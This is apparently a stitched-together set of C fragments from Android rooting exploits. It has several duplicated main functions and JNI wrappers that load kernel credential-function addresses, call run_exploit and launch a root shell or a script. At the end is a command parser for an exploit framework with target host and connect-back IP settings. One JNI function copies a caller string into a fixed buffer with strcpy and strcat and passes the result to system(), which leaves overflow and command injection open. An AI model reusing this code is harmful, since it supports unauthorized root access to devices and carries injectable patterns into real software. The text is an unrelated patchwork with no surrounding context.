JNIEXPORT int JNICALL Java_biz_hagurekamome_rootkitapp_MainActivity_native_1getroot
(JNIEnv *env, jobject jo, jlong prepare_kernel_cred_addr, jlong commit_creds_addr, jlong ptmx_fops_addr)
{
int result;
unsigned long prepare_kernel_cred_address;
unsigned long commit_creds_address;
pid_t pid;
prepare_kernel_cred_address = (unsigned long)prepare_kernel_cred_addr;
commit_creds_address = (unsigned long)commit_creds_addr;
ptmx_fops = (unsigned long)ptmx_fops_addr;
prepare_kernel_cred = (void *)prepare_kernel_cred_address;
commit_creds = (void *)commit_creds_address;
run_exploit();
if (getuid() != 0) {
return -1;
}
return 0;
}
int
main(int argc, char **argv)
{
char* command = NULL;
int i;
for (i = 1; i < argc; i++) {
if (!strcmp(argv[i], "-c")) {
if (++i < argc) {
command = argv[i];
}
}
}
device_detected();
if (!setup_variables()) {
printf("Failed to setup variables.\n");
exit(EXIT_FAILURE);
}
run_exploit();
if (getuid() != 0) {
printf("Failed to obtain root privilege.\n");
exit(EXIT_FAILURE);
}
if (command == NULL) {
system("/system/bin/sh");
} else {
execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL);
}
exit(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
set_kernel_phys_offset(0x200000);
remap_pfn_range = get_remap_pfn_range_address();
if (!remap_pfn_range) {
printf("You need to manage to get remap_pfn_range addresses.\n");
exit(EXIT_FAILURE);
}
if (!setup_creds_functions()) {
printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
exit(EXIT_FAILURE);
}
run_exploit();
if (getuid() != 0) {
printf("Failed to obtain root privilege.\n");
exit(EXIT_FAILURE);
}
system("/system/bin/sh");
exit(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
run_exploit();
if (getuid() != 0) {
printf("Failed to obtain root privilege.\n");
exit(EXIT_FAILURE);
}
system("/system/bin/sh");
exit(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
if (!setup_creds_functions()) {
printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
exit(EXIT_FAILURE);
}
run_exploit();
if (getuid() != 0) {
printf("Failed to obtain root privilege.\n");
exit(EXIT_FAILURE);
}
system("/system/bin/sh");
exit(EXIT_SUCCESS);
}
JNIEXPORT int JNICALL Java_biz_hagurekamome_getroot_MainActivity_native_1getroot
(JNIEnv *env, jobject jo, jstring jstr)
{
char cachebuf[256];
const char *execommand = "/install_tool.sh ";
const char *param = " >/data/local/tmp/err.txt 2>&1";
const char *str;
int result;
str = (*env)->GetStringUTFChars(env, jstr, 0);
strcpy(cachebuf, str);
strcat(cachebuf, execommand);
strcat(cachebuf, str);
strcat(cachebuf, param);
pid_t pid;
if ( !detect_injection_addresses() ){
return -1;
}
prepare_kernel_cred = supported_devices[st_pos].prepare_kernel_cred;
commit_creds = supported_devices[st_pos].commit_creds;
run_exploit();
if (getuid() != 0) {
return -2;
}
result = system(cachebuf);
/*
result = system("/data/data/biz.hagurekamome.jnitest/cache/install_tool.sh >/data/local/tmp/err.txt 2>&1");
*/
if (result != 0){
return result;
}
return 0;
}
int
main(int argc, char **argv)
{
char* command = NULL;
int i;
for (i = 1; i < argc; i++) {
if (!strcmp(argv[i], "-c")) {
if (++i < argc) {
command = argv[i];
}
}
}
set_kernel_phys_offset(0x200000);
remap_pfn_range = get_remap_pfn_range_address();
if (!remap_pfn_range) {
printf("You need to manage to get remap_pfn_range addresses.\n");
exit(EXIT_FAILURE);
}
if (!setup_creds_functions()) {
printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
exit(EXIT_FAILURE);
}
run_exploit();
if (getuid() != 0) {
printf("Failed to obtain root privilege.\n");
exit(EXIT_FAILURE);
}
if (command == NULL) {
system("/system/bin/sh");
} else {
execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL);
}
exit(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
printf("run_root_shell v2.2\n");
printf("Based on pref_event exploit\n\n");
printf("Modified for auto-rooting by DooMLoRD\n");
printf("Part of Easy Rooting Toolkit\n\n");
printf("Changelog:\n");
printf("v2.0: added support for Xperia S (LT26) {FW: 6.2.B.0.211} [Cust: 1257-8080]\n");
printf("v2.1: added support for Xperia Z (C6603) {FW: 10.1.1.A.1.307} [Cust: 1270-6704]\n");
printf("v2.2: added support for Xperia SP (C5302) {FW: 12.0.A.1.284} [Cust: 1272-1092]\n");
set_kernel_phys_offset(0x200000);
remap_pfn_range = get_remap_pfn_range_address();
if (!remap_pfn_range) {
printf("You need to manage to get remap_pfn_range addresses.\n");
exit(EXIT_FAILURE);
}
if (!setup_creds_functions()) {
printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
exit(EXIT_FAILURE);
}
run_exploit();
if (getuid() != 0) {
printf("Failed to obtain root privilege.\n");
exit(EXIT_FAILURE);
} else {
printf("Launching auto-root script!\n");
system("/system/bin/sh /data/local/tmp/doomed2");
}
exit(EXIT_SUCCESS);
}
int main(int argc, char **argv) {
pid_t pid;
if ( !detect_injection_addresses() ){
return -1;
}
prepare_kernel_cred = supported_devices[st_pos].prepare_kernel_cred;
commit_creds = supported_devices[st_pos].commit_creds;
printf("Try Get TempRoot...\n");
run_exploit();
if (getuid() != 0) {
printf("Failed to getroot.\n");
exit(EXIT_FAILURE);
}
printf("Succeeded in getroot!\n");
system(EXECCOMMAND);
exit(EXIT_SUCCESS);
return 0;
}
int
parse_command(char *line)
{
char *token;
token = strtok (line, " ");
while (token != NULL) {
/* set */
if ( strcmp(token, "set") == 0) {
token = strtok(NULL, " ");
if ( strcmp(token, "target_host") == 0) {
token = strtok(NULL, " ");
snprintf(target_host, 254, "%s", token);
printf("\n%s[!]%s target_host set : %s\n\n", _GREEN, _ENDC, target_host);
}
if ( strcmp(token, "connect_back_ip") == 0) {
token = strtok(NULL, " ");
snprintf(connect_back_ip, 254, "%s", token);
printf("\n%s[!]%s connect_back_ip set : %s\n\n", _GREEN, _ENDC, connect_back_ip);
}
}
/* show */
if ( strcmp(token, "show") == 0) {
token = strtok(NULL, " ");
chomp(token);
if ( strcmp(token, "exploits") == 0) {
show_all_modules_by_type("EXPLOIT");
}
}
/* use */
if ( strcmp(token, "use") == 0) {
token = strtok(NULL, " ");
if ( strcmp(token, "exploit") == 0) {
token = strtok(NULL, " ");
chomp(token);
if ( is_int(token) ) {
if ( module_exists( atoi(token) ) ) {
current_exploit = atoi(token);
printf("\n%s[!]%s exploit ready\n\n", _GREEN, _ENDC);
}
else {
printf("\n%s[!]%s could not find exploit\n\n", _RED, _ENDC);
}
}
else {
current_exploit = find_module_by_path(token);
if (current_exploit >= 0 ) {
printf("\n%s[!]%s exploit ready\n\n", _GREEN, _ENDC);
}
else {
printf("\n%s[!]%s could not find exploit\n\n", _RED, _ENDC);
}
}
}
}
/* use */
if ( strcmp(token, "exploit") == 0) {
if (current_exploit < 0 ) {
printf("\n%s[!]%s no exploit set \n\n", _RED, _ENDC);
}
else {
if ( check_exploit_params() ) {
run_exploit();
}
}
}
token = strtok(NULL, " ");
}
}
